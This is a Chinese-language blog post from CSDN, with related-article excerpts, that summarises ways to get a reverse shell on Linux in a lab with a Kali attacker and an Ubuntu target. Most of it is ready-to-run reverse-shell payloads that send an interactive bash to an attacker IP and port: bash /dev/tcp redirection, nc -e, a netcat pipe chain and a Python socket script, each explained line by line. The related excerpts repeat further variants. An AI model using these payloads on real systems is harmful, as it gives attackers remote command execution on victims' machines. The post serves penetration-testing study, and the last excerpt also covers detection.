Linux反弹shell方式总结

最新推荐文章于 2023-12-28 17:28:10 发布
最新推荐文章于 2023-12-28 17:28:10 发布
阅读量854 收藏 6
点赞数
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43936524/article/details/111003949
版权

文章目录

bash反弹

反弹指令:
bash -i >& /dev/tcp/ip/port 0>&1
反弹步骤:
在kail上开启7777侦听:
nc -lvp 7777
在靶机上输入反弹指令即可反弹成功

基础知识

linux下有三个标准的文件描述符:
0 - stdin 代表标准输入,使用<或<<
1 - stdout 代表标准输出,使用>或>>
2 - stderr 代表标准错误输出,使用2>或2>>

>&代表重定向
当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符

指令分析

  1. bash -i表示本地打开一个bash
  2. /dec/tcp时linux系统一个特殊的设备,打开这个文件后会自动建立一个socket以连接对应IP的端口。而>&后面加上这个远端连接就等于将本地的标准输出标准错误输出重定向到远端的连接。假如连接的IP对应端口处于listening状态,在靶机输入指令结果就会在kail上显示。

在kail上开启监听 7777端口
在这里插入图片描述
ubuntu上打开一个bash并将标准输出和错误重定位到kail的连接上。
在这里插入图片描述
此时在ubuntu上输入ls,发现已经指令和结果已经显示到kail上。
在这里插入图片描述
因为没有将标准输入重定向到kail中故在kail中输入指令无法得到结果。
在这里插入图片描述

  1. 而0>&1则代表将标准输入重定向到标准输出,由2.可知标准输出已经重定向到远程,故可在远端输入指令,同时在远端显示指令输出的内容。
    输入bash -i >& /dev/tcp/ip/port 0>&1将输入流重定位后,kail可输入指令并返回结果。
    在这里插入图片描述
    0>&2的效果也相同,因为标准错误输出也已经重定位到了kail上。

netcat反弹

nc反弹shell的前提条件是靶机上需要支持nc命令,且根据nc版本的不同反弹的指令也略有差异。

nc -e反弹

假如nc上有 -e 命令,可用nc -h查看
反弹指令:nc -e /bin/bash 192.168.169.128 7777
反弹指令的意思是nc建立连接后可以执行-e后面的文件/bin/bash即可以执行shell指令。
在这里插入图片描述

使用管道符反弹

假如nc不支持 -e 指令就要使用linux的管道符来帮助反弹shell

管道符 | 可理解为管道符前的输出经过管道符传输给了管道符后当作输入。

在kail上开启7777和8888的端口。
在ubuntu输入反弹指令:nc 192.168.169.128 7777|/bin/bash|192.168.169.128 8888

在这里插入图片描述
在这里插入图片描述
此时在7777监听端口输入的指令会传到ubuntu中被/bin/bash执行,输出的结果又会传到8888监听端口中显示
在这里插入图片描述

python反弹

在kail上开启7777端口监听
反弹指令:

python3 -c "import os,socket,subprocess;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(('192.168.169.128',7777));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
p=subprocess.call(['/bin/bash','-i'])"

在这里插入图片描述
在这里插入图片描述

指令分析

# 导入所需要的os,socket,subprocess包
"import os,socket,subprocess;
# 创建一个tcp套接字
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
# 与目标ip 端口号建立tcp连接
s.connect(('192.168.169.128',7777));
# os.dup2() 方法用于将一个文件描述符 fd 复制到另一个 fd2。
# 分别将标准输入,标准输出,标准错误输出重定向到远端的连接
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
# 打开一个子进程以-i 交互的方式执行
p=subprocess.call(['/bin/bash','-i'])"

未完待续…

kit_1
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
LinuxNC反弹shell命令(推荐)
09-15
主要介绍了LinuxNC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人认为太笼统了,比如bash-i, nc -e /bin/bash, pty , socat都是交互式反弹shell,但是他们本身有很大的不同。单拿bash -i和nc -e /bin/bash来说,都是弹bash,为啥- -个加-i,- -个不加,他们有什么不同,统称为交互式,会掩盖了很多技术细节,所以我换了个视角将反弹shell更细区分出来,并说明本质以及每种之间如何转化。
浅析Linux之bash反弹shell原理
01-08
环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其
图文介绍——NC使用笔记
LainWith的博客
01-20 7271
NC 简介 Netcat 简称为nc,中文名网猫,被誉为网络工具中的瑞士军刀。具备以下功能: 侦听模式/传输模式 telnet/获取 banner信息(当作telent工具使用,甚至更好用) 传输文本信息(可以作为聊天工具) 传输文件/目录 加密传输文件 远程控制/木马(一般来说,不会被查杀) 加密所有流量 流媒体服务器 远程克隆硬盘(一般用作电子取证) nc 有很多变种。不同的变种,会在原有 nc 的基础上增加一些新功能。比较流行的变种之一是OpenBSD 社区的变种(也叫“OpenBSD netc
反弹shell学习(一):基础反弹姿势
E1even的博客
07-25 1853
文章目录bash反弹nc反弹:-e被阉割的情况:nc -e:利用Telnet反弹shell方法1:方法2:python脚本反弹:PHP反弹shell总结: bash反弹: 这是最常见也是最简单的一种反弹shell方式,直接看命令: 攻击机:nc -lvp 2333 受害机:bash -i >& /dev/tcp/192.168.28.133/2333 0>&1 攻击机: 受害机: 最后攻击机达成的效果: 可以命令执行,再实际中不可能获取的是root权限,所以成功反弹s
linux反弹shell总结
redwand的博客
02-22 1352
本文总结Linux下常用的反弹shell方式,同时说明了交互式shell的得到方法,最后积累了反弹shell语法高亮与tab自动补齐。
关于nc无法使用-e参数 nc:invalid option -- ‘e’
tonine9的博客
07-24 3177
关于nc无法使用-e参数,解决方法。安装之后,由于ubuntu默认安装的是netcat-openbsd,选择/bin/nc.traditional的编号。nc老版本是不能采用-e这个参数的。
linux反弹shell
Xi4or0uji
09-25 1878
最近做了几题都是反弹shell总结一哈 bash bash -i &gt;&amp; /dev/tcp/vps_ip/端口号 0&gt;&amp;1 bash -i 生成一个交互式的子进程 &amp;表示在Linux后台运行 /dev/tcp/vps_ip/端口号 其实是与主机建立tcp连接 /dev/[tcp|upd]/host/port是Linux里面比较特殊的文件,读取和写入相...
详解nc命令
热门推荐
noShutdown的博客
03-14 1万+
原文地址: https://www.myjinji.top/articles/2021/03/13/1615638735341.html nc(netcat),网络工具中的瑞士军刀。 Windows与Linux平台都有它的身影,因为它短小精悍,功能实用,被设计为一个简单、可靠的网络工具,可通过TCP或UDP协议传输读写数据。 0x01 端口扫描 nc -z -v -n 192.168.78.128 22 -z 表示为zero,意思是扫描时不发送任何数据包 -v 即为详细输出 -n 不使用dns反向查.
NC不使用-e选项反弹shell
weixin_34352449的博客
06-25 2350
对于瑞士×××nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在***测试过程中如果想反弹shell我们通常的做法是:Attacker: nc -lnvp listenportVictim: nc attackerip listenport -e /bin/sh在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的n...
各种反弹shell方式
m0_58606546的博客
11-17 2242
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
nc不支持-e时的反弹
最新发布
神棍之路
12-28 465
【代码】nc不支持-e时的反弹
nc命令详解
10-16 505
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧……一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。nc命令详解Filed under: security
linux使用nc 反弹shell
qq_30890029的博客
04-20 407
但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决。本机【攻击机】开启nc监听:nc -lvnp 9999。受害机器反弹shell《两种常见反弹shell
强大的nc命令(英文说明)!
A coder of life
01-20 1826
在命令行输入命令:man ncnc -h即可查看nc命令的使用说明,前者更为详细,虽说是英文,但用法不难看懂。如下: NAME      nc - arbitrary TCP and UDP connections and listens SYNOPSIS      nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 8863
文章目录 前言 为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(
Linux常用命令
hangoer的博客
08-28 690
命令格式的说明 命令格式:命令 [-选项][参数] 参数 eg: [root@qianfeng01 ~]# ls -la /usr 说明: ⼤部分命令遵从该格式 多个选项时,可以⼀起写 eg: [root@qianfeng01 ~]# ls –l –a ls –la 简化选项与完整选项(注:并⾮所有选项都可使⽤完整选项) eg: [root@qianfeng01 ~]# ls –all ls –a 帮助命令:(相当于命令说明书) 帮助命令 man 英⽂:manual 命令路径:/usr/bin/man 执
对于反弹shell语句bash命令的理解
WihauShe's Blogger
03-10 743
(个人经验,仅供参考,错误之处,敬请谅解) 缘由 &nbsp;&nbsp;在学习Wen渗透过程中,遇到了“反弹shell” 这个专业名词。于是查询找到了整个反弹shell的过程,但对于其中第一条命令尤其不解. bash -i &gt;&amp; /dev/tcp/[ip]/[port] 0&gt;&amp;1 经过 &nbsp;&nbsp;起初如果搜这个bash命令,很难找到这个命令和反弹sh...
linux反弹shell检测
08-22
Linux 反弹 shell 是一种攻击技术,攻击者利用漏洞或恶意代码将远程 shell 注入受害者的系统,从而获取对系统的控制权。为了检测 Linux 反弹 shell,可以采取以下几种方法: 1. 监控网络活动:使用网络监控工具,如 tcpdump 或 Wireshark,检查网络流量是否存在异常连接或未知的传出连接。特别关注与反弹 shell 相关的常见端口(如 4444、31337)。 2. 检查系统进程:使用 ps 或 top 命令检查正在运行的进程列表,查找不明确的、不信任的或异常的进程。特别关注与反弹 shell 相关的常见进程名称(如 netcat、nc、socat)。 3. 检查系统文件:使用查找命令(如 find)或相关工具,检查系统文件是否存在未知的、可疑的或异常的文件。特别关注与反弹 shell 相关的常见文件名和路径(如 .bashrc、.bash_profile、.ssh/authorized_keys)。 4. 检查系统日志:查看系统日志文件,如 /var/log/auth.log 或 /var/log/secure,检查是否存在异常登录尝试或认证失败记录,以及与反弹 shell 相关的异常日志。 5. 使用专业工具:使用专门的安全工具,如 LOKI、Lynis、AIDE 等,来扫描系统并检测可能的反弹 shell 活动。这些工具可以自动化检测系统中的恶意活动和异常行为。 请注意,这些方法可以帮助您发现潜在的反弹 shell 活动,但不能保证绝对的安全。建议您定期更新系统、安装最新的安全补丁,并采取其他安全措施来确保系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值